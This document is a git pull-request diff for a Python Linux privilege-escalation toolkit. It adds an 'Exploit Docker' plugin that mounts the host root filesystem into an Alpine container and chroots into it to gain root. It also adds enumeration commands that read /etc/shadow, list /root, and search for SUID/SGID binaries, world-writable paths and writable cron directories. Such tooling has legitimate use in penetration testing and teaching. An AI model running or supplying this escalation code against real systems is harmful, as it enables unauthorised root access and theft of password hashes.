Merge pull request #1 from roxbeecoxb/master

Added Bens plugins. Still need to write file info function.

src/leap.py

@@ -1,21 +1,24 @@
-#!/usr/bin/env python3
+
 
 from omar_plugins import linCatEscalator    
 from omar_plugins import HostInfo 
 from omar_plugins import NetInfo 
-from omar_plugins import AppInfo  
-
+from omar_plugins import AppInfo 
+from omar_plugins import linCronInfo
+from omar_plugins import docker
 
 
 if __name__=="__main__":
     #Make a list of available privescs
     pes=[]
     pes.append(linCatEscalator())
+    pes.append(docker())
     #And enumerations
     ens=[]
     ens.append(HostInfo())
     ens.append(NetInfo())
     ens.append(AppInfo())
+    ens.append(linCronInfo())
 
 
     shouldQuit=False

src/omar_plugins.py

@@ -1,6 +1,7 @@
 
 
 from plugins import PrivEsc, Enumeration
+from os import popen
 
 import os, tempfile
 
@@ -13,6 +14,7 @@ import subprocess
 import pathlib, stat
 
 
+
 # A very basic method, but useful
 def shellRun(command):
     """ Put given commands into a temporary file, spawn a shell and explain how to use the command """
@@ -48,7 +50,7 @@ def GrabOutput(command):
 def CheckBinary(p):
     pl=pathlib.Path(p)
     exists=pl.exists()
-    suid=False
+    suid = False
     if exists:
         suid=(pl.stat().st_mode & stat.S_ISUID)!=0
     return (exists, suid) 
@@ -72,7 +74,7 @@ class linCatEscalator(PrivEsc):
         print(out)
 
 
-class LinHostInfo(Enumeration):
+class HostInfo(Enumeration):
     def __init__(self):
         Enumeration.__init__(self)
         self.name="Host Information"
@@ -115,7 +117,7 @@ class LinHostInfo(Enumeration):
         os.system("ls -la")
 
 
-class LinNetInfo(Enumeration):
+class NetInfo(Enumeration):
     def __init__(self):
         Enumeration.__init__(self)
         self.name="Network Information"
@@ -150,7 +152,7 @@ class LinNetInfo(Enumeration):
         os.system("chkconfig --list")
 
 
-class LinAppInfo(Enumeration):
+class AppInfo(Enumeration):
     def __init__(self):
         Enumeration.__init__(self)
         self.name="Applications and Services"
@@ -176,4 +178,88 @@ class LinAppInfo(Enumeration):
         os.system("ls -alh /var/cache/yum/")
 
 
+lineBreak = "--------------------------------------"  # Visual seperation
+
+results = []
+
+"""Find cron info. Ben Roxbee Cox"""
+
+
+linSensitiveFiles = {"GROUP": {"cmd": "cat /etc/group", "msg": "Can You Read The Groups File?", "results": results},
+                     "SHADOW": {"cmd": "cat /etc/shadow", "msg": "Can You Read The Shadow File?", "results": results},
+                     "MAIL": {"cmd": "ls -alh /var/mail/", "msg": "Any Mail?", "results": results},
+                     "ROOTDIR": {"cmd": "ls -al /root/", "msg": "Can you read the root directory?", "results": results},
+                     "HOMEDIR": {"cmd": "ls -al /home/", "msg": "Any interesting files in the home directory?", "results": results},
+                     "SGID": {"cmd": "find / -perm -g=s -type f 2>/dev/null", "msg": "Any useful SGID Files?"},
+                     "SUID": {"cmd": "find / -perm -u=s -type f 2>/dev/null", "msg": "Any useful SUID Files?", "results": results},
+                     "WRLDWX": {"cmd": "find / \( -perm -o w -perm -o x \) -type d 2>/dev/null", "msg": "World Writable & Executable Files", "results": results}
+                     }
+
+
+
+def findResults(eCommands):
+    """Each item will pass through this function for subprocessing Ben's command dictionary
+
+    args:
+        eCommands : Dictionary containing commands to be progecessed.
+    returns:
+        eCommands : Dictionary with outputs populated.
+    """
+    for command in eCommands:
+        cmd = eCommands[command]["cmd"]
+        output, error = subprocess.Popen([cmd], stdout=subprocess.PIPE,
+                                         stderr=subprocess.PIPE,
+                                         shell=True).communicate()
+        results = output.split(b"/")
+        eCommands[command]["results"] = results
+    return eCommands
+
+
+def showResults(output):
+    """Print results found to the terminal.
 
+    args:
+        output : Dictionary of commands and outputs to be printed. Prints results of Ben's found enums
+    """
+    for item in output:
+        msg = output[item]["msg"]
+        results = output[item]["results"]
+        print("\n\n" +"[+] " + msg + "\n" + lineBreak)
+        for result in results:
+            if result.strip() != "":
+                print(result.decode("utf") + " ", end="")
+        print("\n")
+    return
+
+
+class linCronInfo(Enumeration):
+    def __init__(self):
+        Enumeration.__init__(self)
+        self.name="Cron Jobs"
+        self.author="Ben Roxbee Cox"
+        self.description="List running Cron jobs"
+        return
+
+    def execute(self):
+        linCronInfo = {"CRON": {"cmd": "ls -p -la /etc/cron* 2>/dev/null",
+                       "msg": "Scheduled cron jobs", "results": results},
+                       "CRONW": {"cmd": "ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null",
+                       "msg": "Writable cron dirs", "results": results}
+            }
+        enumPer = linCronInfo
+        enumPerameter = findResults(enumPer)
+        showResults(enumPerameter)
+        return
+
+class docker(PrivEsc):
+    def __init__(self):
+        self.name="Exploit Docker"
+        self.author="Ben Roxbee Cox"
+        self.description="Exploits a known vulnerability if a user is in the Docker group"
+        self.version=""
+        return
+
+    def execute(self):
+        id = popen("id").read()    # Get user groups
+        if "docker" in id:  os.system("docker run -it -v /:/mnt alpine chroot /mnt")    # priv esc
+        return()